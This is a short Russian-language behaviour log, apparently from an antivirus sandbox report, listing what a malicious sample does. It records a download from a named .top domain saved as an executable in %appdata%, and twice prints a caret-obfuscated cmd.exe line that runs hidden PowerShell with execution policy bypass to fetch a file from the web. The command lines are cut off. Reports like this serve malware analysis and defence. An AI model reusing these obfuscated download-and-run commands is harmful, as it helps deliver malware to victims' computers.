Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^o^W^eRshEL^L.eX^E -^EX^EC^u^tIOnpo^l^I^c^Y ^BYPa^ss ^-n^OpR^Ofi^LE^ -W^ind^O^wStyLe^ hi^d^D^En ^(ne^w^-^o^B^Ject^ ^sySTEM.^n^et.W^EBC^LIe^n^T^)^.^d^O^WN^Load^fi^lE(^'http://ww...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "p^o^W^eRshEL^L.eX^E -^EX^EC^u^tIOnpo^l^I^c^Y ^BYPa^ss ^-n^OpR^Ofi^LE^ -W^ind^O^wStyLe^ hi^d^D^En ^(ne^w^-^o^B^Ject^ ^sySTEM.^n^et.W^EBC^LIe^n^T^)^.^d^O^WN^Load^fi^lE(^'http://ww...' (со скрытым окном)